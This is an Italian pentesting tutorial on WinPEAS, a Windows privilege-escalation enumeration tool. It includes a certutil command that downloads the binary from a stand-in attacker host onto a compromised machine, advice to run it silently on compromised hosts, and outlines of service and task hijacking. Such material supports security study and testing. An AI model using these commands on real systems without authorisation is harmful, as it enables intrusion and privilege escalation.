Tutorials

Guida Approfondita su WinPEAS

WinPEAS Windows Privilege Escalation Awesome Script è uno script sviluppato come parte del progetto PEASS-ng. È ampiamente utilizzato nei processi di post-exploitation per automatizzare la raccolta di

#exploitation#post-exploitation#windows

Guida Approfondita su WinPEAS

Introduzione

WinPEAS (Windows Privilege Escalation Awesome Script) è uno script sviluppato come parte del progetto PEASS-ng. È ampiamente utilizzato nei processi di post-exploitation per automatizzare la raccolta di informazioni su potenziali vulnerabilità e configurazioni errate all'interno di sistemi Windows compromessi. WinPEAS è uno dei tool più completi per l'enumerazione automatica.

Obiettivi del Tool

  • Rilevamento di misconfigurazioni di sistema.
  • Identificazione di servizi vulnerabili o configurati impropriamente.
  • Scoperta di credenziali in chiaro.
  • Verifica delle ACL su file e directory sensibili.
  • Identificazione di binari eseguibili con privilegi elevati.

Versioni Disponibili

  • winPEASany.exe: compatibile con tutte le versioni Windows, senza necessità di .NET.
  • winPEASx64.exe / winPEASx86.exe: versioni specifiche per architetture x64 o x86, spesso con output più dettagliato.
  • Versione script (batch, PowerShell): meno utilizzata, ma utile in ambienti con forti restrizioni.

Download del Tool

Puoi scaricare le versioni binarie da GitHub:

bash
https://github.com/carlospolop/PEASS-ng/releases/latest

Oppure clonare direttamente il repository:

bash
git clone https://github.com/carlospolop/PEASS-ng

Esecuzione su Host Compromesso

Trasferimento del binario

cmd
certutil -urlcache -split -f http://ATTACKER_IP/winPEASx64.exe winpeas.exe

Esecuzione semplice

cmd
winpeas.exe

Esecuzione con output su file

cmd
winpeas.exe > output.txt

Cosa Enumera WinPEAS

1. Informazioni di Sistema

  • Versione Windows, architettura, patch installate
  • UAC e token info

2. Utenti e Gruppi

  • Utenti loggati
  • Membri del gruppo Administrators
  • Account con password mai cambiata

3. Servizi

  • Servizi con binari scrivibili da utenti non privilegiati
  • Servizi che eseguono con privilegi elevati

4. Programmi e Task Pianificati

  • Applicazioni installate
  • Task pianificati mal configurati

5. Autostart e Persistence

  • Chiavi di registro di avvio automatico
  • Possibili persistence vectors

6. File e Directory

  • Permessi anomali (es. Everyone:F su file sensibili)
  • Configurazioni potenzialmente scrivibili

7. Credenziali e Config

  • File .ini, .xml, .config contenenti credenziali
  • Connessioni RDP salvate

8. Named Pipes, DLL Hijacking e altro

  • Possibili vulnerabilità sfruttabili per privilege escalation
  • Path DLL non sicuri

Esempi di Privilege Escalation Facilitati da WinPEAS

  • Servizio configurato per usare un binario scrivibile → sostituzione con payload.
  • Task pianificato con ACL permissivi → hijack del task.
  • Credenziali trovate in un file .xml → login con utente privilegiato.

Best Practice per l'Uso

  • Eseguire come utente limitato: risultati realistici.
  • Salvare l’output per analisi offline.
  • Eseguire in modalità silenziosa su host produttivi compromessi.

Mitigazioni per Defender

  • Monitoraggio attivo dell'esecuzione di binari da percorsi temporanei.
  • Rimozione o restrizione degli account inutilizzati.
  • Revisione periodica dei permessi NTFS su file critici.

Risorse Utili


Conclusione

WinPEAS è uno dei tool più potenti per l'enumerazione in ambienti Windows durante il pentesting. È altamente consigliato includerlo in ogni assessment su host Windows, soprattutto nei casi in cui si abbia accesso limitato e si necessiti di scalare i privilegi in maniera efficiente e documentata.